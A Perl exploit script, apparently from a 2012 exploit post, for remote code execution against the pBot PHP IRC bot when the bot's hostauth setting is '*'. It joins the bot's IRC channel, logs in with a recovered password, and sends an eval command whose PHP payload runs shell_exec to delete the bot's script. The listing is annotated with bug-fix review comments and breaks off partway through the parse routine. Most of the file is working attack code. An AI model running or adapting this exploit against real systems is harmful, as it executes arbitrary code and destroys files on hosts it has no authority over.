Posted on 01 August 2012
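#!/usr/bin/perl
# Exploit Title: pBot Remote Code Execution ("*" hostauth)
# Date: 31.07.2012
# Exploit Author: @bwallHatesTwits
# Software Link: https://www.firebwall.com/decoding/read.php?u=620d21fd31b87046e94975e03fdafa8a (decoded from attempted attack)
# Version: Various versions
# Tested on: Linux 3.2
#
# How it works: pBot is a PHP IRC bot.  When its "hostauth" setting is "*"
# the bot accepts "<trigger><loginCMD> <password>" from ANY hostmask, and a
# logged-in user can then send "<trigger>eval <php>", which the bot passes to
# PHP eval() with the bot's own privileges.  This script connects to the
# bot's IRC server, and on each JOIN it logs in with the password recovered
# from the decoded bot source, sends a PHP payload and disconnects once every
# configured channel has been served.
#
# Caveats a user of this script should know:
#   - The server, channel(s), trigger and password below must be taken from
#     the decoded bot; nothing here discovers or brute-forces them.
#   - The payload removes $_SERVER['SCRIPT_NAME'].  For a CLI-started bot
#     that is the path as typed on the command line and may be relative to
#     the bot's working directory; $_SERVER['SCRIPT_FILENAME'] is usually the
#     more reliable choice.  The path is also passed to the shell unquoted,
#     so a name containing spaces or shell metacharacters will not be removed.
#   - Connecting to the bot's server/channel means talking directly to
#     attacker-operated infrastructure; run this from an isolated host and
#     only with authorization to act against that bot.
#
# NOTE(review): say(), quit() and the connect/main loop are defined later in
# this file, outside this excerpt.  Because that code relies on undeclared
# package globals, `use strict` is not enabled here; the globals the visible
# subs share are declared with `our` so the file stays strict-ready.  Do not
# enable the `say` feature (e.g. via `use v5.10`): it would shadow the
# script's own say() sub.

use warnings;

use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;

# Identity presented to the IRC server.
my $nickname = "BotSlayer";
my $ident    = "BotSlayer";
my $fullname = "BotSlayer";

our $sel_client = IO::Select->new();

# Configuration values taken from the decoded bot source.
our $ircserver     = "localhost";   # "server"
our $ircserverpass = "";            # "pass"
my  $ircport       = "6667";        # "port"
# If the bot's "key" is set, append a space and the key to the channel name.
my  @channels      = ("#anonbxu");  # "chan" and "chan2"
our $botPass       = "hello";       # "password"
our $botTrigger    = ".";           # "trigger"
# "hostauth" must be "*" in the bot config, otherwise our login is ignored.
our $loginCMD      = "user";        # usually "user" or "login"

# Payload: PHP code the bot will eval().  This version deletes the bot's
# originating script and exits.  q{} keeps Perl from interpolating $_SERVER
# and avoids escaping the inner double quotes (the original listing lost its
# backslashes when it was published, leaving an unterminated string).
our $phpEval = q{shell_exec("rm -f ".$_SERVER['SCRIPT_NAME']);exit();};

# Channels still waiting for the payload; tryQuit() disconnects at zero.
our $channelCount = scalar(@channels);

# Package globals shared by sendraw()/conn() and the rest of the file.
our $IRC_cur_socket;
our %irc_servers;

# Called for each JOIN the server reports.  Logs in to the bot in $channel,
# hands it the payload after a short pause, then counts down towards quitting.
# $channel is the raw JOIN argument; many servers send it as ":#chan".
sub onJoin {
    my ($channel) = @_;

    # Strip only a leading ':'.  The original used substr($channel, 1), which
    # also eats the '#' when a server sends "JOIN #chan" without the colon.
    $channel =~ s/^://;
    print "Joined $channel\n";

    say($channel, $botTrigger . $loginCMD . " " . $botPass);
    sleep(1);   # let the bot process the login before the eval arrives

    # The original wrote "eval @BallastSec " inside double quotes, so Perl
    # interpolated the (empty) array @BallastSec and the bot actually received
    # ".eval  <php>" with two spaces.  That exact text is kept here: sending
    # a literal "@BallastSec" would hand PHP a parse error instead of code.
    say($channel, $botTrigger . "eval  " . $phpEval);
    print "Payload delivered\n";

    tryQuit();
}

# Decrement the outstanding-channel counter and disconnect (via quit(),
# defined elsewhere in this file) once every configured channel has
# received the payload.
sub tryQuit {
    $channelCount--;
    quit("whomp wha") if $channelCount <= 0;
}

# Write one raw IRC line.  sendraw($socket, $line) writes to the given
# socket; sendraw($line) writes to the current connection ($IRC_cur_socket).
# The line is terminated with CRLF as the IRC protocol requires (the
# published listing had lost the "\n" escape, sending a bare space instead).
sub sendraw {
    my ($sock, $line) = (@_ == 2) ? @_ : ($IRC_cur_socket, $_[0]);
    print {$sock} "$line\r\n";
}

# Open a TCP connection to $ircserver_con:$ircport_con and send the IRC
# registration (PASS if configured, NICK, USER).
#
# Side effects: sets $IRC_cur_socket, records host/port/nick/myip in
# %irc_servers keyed by the socket, and adds the socket to $sel_client.
#
# Returns 1 when the TCP connect fails.  The original also returned 1 on
# success (the value of its trailing sleep), and callers elsewhere in the
# file may not check it at all, so that contract is kept; test
# %irc_servers rather than the return value to learn whether we are connected.
sub conn {
    my ($mynick, $ircserver_con, $ircport_con) = @_;

    my $IRC_socket = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $ircserver_con,
        PeerPort => $ircport_con,
        Timeout  => 30,   # do not block forever on an unreachable C2 host
    ) or return 1;

    $IRC_cur_socket = $IRC_socket;
    $IRC_socket->autoflush(1);
    $sel_client->add($IRC_socket);

    $irc_servers{$IRC_cur_socket} = {
        host => $ircserver_con,
        port => $ircport_con,
        nick => $mynick,
        myip => $IRC_socket->sockhost,
    };

    # The original tested `$ircserverpass != ""` -- a numeric comparison that
    # is false for any non-numeric password -- so PASS was never sent even
    # when one was configured.  `ne` is the string comparison intended.
    sendraw("PASS " . $ircserverpass) if $ircserverpass ne "";
    sendraw("NICK " . $mynick);
    sendraw("USER $ident " . $IRC_socket->sockhost . " $ircserver_con :$fullname");

    sleep 1;   # give the server a moment before the caller starts reading
    return 1;
}

# Handle one line received from the server.  NOTE: this sub continues past
# the end of this excerpt (the PRIVMSG command dispatch is cut off below), so
# its code is left as found and only reformatted.
# NOTE(review): the JOIN branch matches *every* JOIN the server relays, not
# only our own, so another user joining the channel also triggers onJoin()
# (and a spurious $channelCount decrement).  When the rest of this sub is
# edited, compare $1 against our nick before calling onJoin().
sub parse {
    my $servarg = shift;
    print $servarg." ";
    if ($servarg =~ /^PING :(.*)/) {
        sendraw("PONG :$1");
    } elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) JOIN (.+)/) {
        my $channel = $4;
        onJoin($channel);
    } elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) PRIVMSG (.+?) :(.+)/) {
        my $pn=$1;
        my $hostmask= $3;
        my $onde = $4;
        my $args = $5;
        if ($args =~ /^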